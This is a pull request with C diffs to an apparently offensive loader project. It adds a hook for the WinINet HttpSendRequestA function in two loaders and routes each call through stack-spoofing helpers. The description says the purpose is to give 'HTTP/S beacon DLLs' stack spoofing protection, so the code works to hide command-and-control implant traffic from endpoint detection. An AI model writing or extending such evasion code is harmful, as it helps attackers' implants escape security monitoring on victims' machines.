### PR TITLE
fix: Add hook for HttpSendRequestA

### DIFF
--- a/loader/pico.spec
+++ b/loader/pico.spec
@@ -35,6 +35,7 @@ x64:
     exportfunc "setup_memory" "__tag_setup_memory"
 
     # hook functions in the DLL
+    addhook "WININET$HttpSendRequestA"    "_HttpSendRequestA"
     addhook "WININET$InternetOpenA"       "_InternetOpenA"
     addhook "WININET$InternetConnectA"    "_InternetConnectA"
     addhook "KERNEL32$CloseHandle"        "_CloseHandle"

--- a/loader/src/hooks.c
+++ b/loader/src/hooks.c
@@ -5,6 +5,7 @@
 #include "memory.h"
 #include "spoof.h"
 
+DECLSPEC_IMPORT HINTERNET WINAPI WININET$HttpSendRequestA    ( HINTERNET, LPCSTR, DWORD, LPVOID, DWORD );
 DECLSPEC_IMPORT HINTERNET WINAPI WININET$InternetConnectA    ( HINTERNET, LPCSTR, INTERNET_PORT, LPCSTR, LPCSTR, DWORD, DWORD, DWORD_PTR );
 DECLSPEC_IMPORT HINTERNET WINAPI WININET$InternetOpenA       ( LPCSTR, DWORD, LPCSTR, LPCSTR, DWORD );
 DECLSPEC_IMPORT BOOL      WINAPI KERNEL32$CloseHandle        ( HANDLE );
@@ -32,6 +33,21 @@ DECLSPEC_IMPORT SIZE_T    WINAPI KERNEL32$VirtualQuery       ( LPCVOID, PMEMORY_
 DECLSPEC_IMPORT BOOL      WINAPI KERNEL32$WriteProcessMemory ( HANDLE, LPVOID, LPCVOID, SIZE_T, SIZE_T * );
 DECLSPEC_IMPORT HRESULT   WINAPI OLE32$CoCreateInstance      ( REFCLSID, LPUNKNOWN, DWORD, REFIID, LPVOID * );
 DECLSPEC_IMPORT ULONG     NTAPI  NTDLL$NtContinue            ( CONTEXT *, BOOLEAN );
+
+BOOL WINAPI _HttpSendRequestA ( HINTERNET hRequest, LPCSTR lpszHeaders, DWORD dwHeadersLength, LPVOID lpOptional, DWORD dwOptionalLength )
+{
+    FUNCTION_CALL call = { 0 };
+
+    call.ptr        = ( PVOID ) ( WININET$HttpSendRequestA );
+    call.argc       = 5;
+    call.args [ 0 ] = spoof_arg ( hRequest );
+    call.args [ 1 ] = spoof_arg ( lpszHeaders );
+    call.args [ 2 ] = spoof_arg ( dwHeadersLength );
+    call.args [ 3 ] = spoof_arg ( lpOptional );
+    call.args [ 4 ] = spoof_arg ( dwOptionalLength );
+
+    return ( BOOL ) spoof_call ( &call );
+}
 
 HINTERNET WINAPI _InternetOpenA ( LPCSTR lpszAgent, DWORD dwAccessType, LPCSTR lpszProxy, LPCSTR lpszProxyBypass, DWORD dwFlags )
 {

--- a/local-loader/pico.spec
+++ b/local-loader/pico.spec
@@ -35,6 +35,7 @@ x64:
     exportfunc "setup_memory" "__tag_setup_memory"
 
     # hook functions in the DLL
+    addhook "WININET$HttpSendRequestA"    "_HttpSendRequestA"
     addhook "WININET$InternetOpenA"       "_InternetOpenA"
     addhook "WININET$InternetConnectA"    "_InternetConnectA"
     addhook "KERNEL32$CloseHandle"        "_CloseHandle"

--- a/local-loader/src/hooks.c
+++ b/local-loader/src/hooks.c
@@ -5,6 +5,7 @@
 #include "memory.h"
 #include "spoof.h"
 
+DECLSPEC_IMPORT HINTERNET WINAPI WININET$HttpSendRequestA    ( HINTERNET, LPCSTR, DWORD, LPVOID, DWORD );
 DECLSPEC_IMPORT HINTERNET WINAPI WININET$InternetConnectA ( HINTERNET, LPCSTR, INTERNET_PORT, LPCSTR, LPCSTR, DWORD, DWORD, DWORD_PTR );
 DECLSPEC_IMPORT HINTERNET WINAPI WININET$InternetOpenA    ( LPCSTR, DWORD, LPCSTR, LPCSTR, DWORD );
 
@@ -38,6 +39,21 @@ DECLSPEC_IMPORT ULONG  NTAPI  NTDLL$NtContinue ( CONTEXT *, BOOLEAN );
 // cannot put this here because it fails to build
 // to PIC when hooks.x64.o is merged into the loader
 // extern MEMORY_LAYOUT g_memory;
+
+BOOL WINAPI _HttpSendRequestA ( HINTERNET hRequest, LPCSTR lpszHeaders, DWORD dwHeadersLength, LPVOID lpOptional, DWORD dwOptionalLength )
+{
+    FUNCTION_CALL call = { 0 };
+
+    call.ptr        = ( PVOID ) ( WININET$HttpSendRequestA );
+    call.argc       = 5;
+    call.args [ 0 ] = spoof_arg ( hRequest );
+    call.args [ 1 ] = spoof_arg ( lpszHeaders );
+    call.args [ 2 ] = spoof_arg ( dwHeadersLength );
+    call.args [ 3 ] = spoof_arg ( lpOptional );
+    call.args [ 4 ] = spoof_arg ( dwOptionalLength );
+
+    return ( BOOL ) spoof_call ( &call );
+}
 
 HINTERNET WINAPI _InternetOpenA ( LPCSTR lpszAgent, DWORD dwAccessType, LPCSTR lpszProxy, LPCSTR lpszProxyBypass, DWORD dwFlags )
 {


### PR DESCRIPTION
This PR simply adds hooking for HttpSendRequestA. 

The base HTTP/S beacon DLLs are using HttpSendRequestA, which is not currently hooked, causing calls to not have the stack spoofing protection needed.

**Before hooking:**
<img width="227" height="170" alt="tmp" src="https://github.com/user-attachments/assets/d8c72713-8b6f-435e-89e9-1c68affdc977" />

**After hooking:**
<img width="224" height="175" alt="tmp2" src="https://github.com/user-attachments/assets/3eac1ca1-d429-4156-9e4a-0e435a4a2d70" />


Thanks Rasta!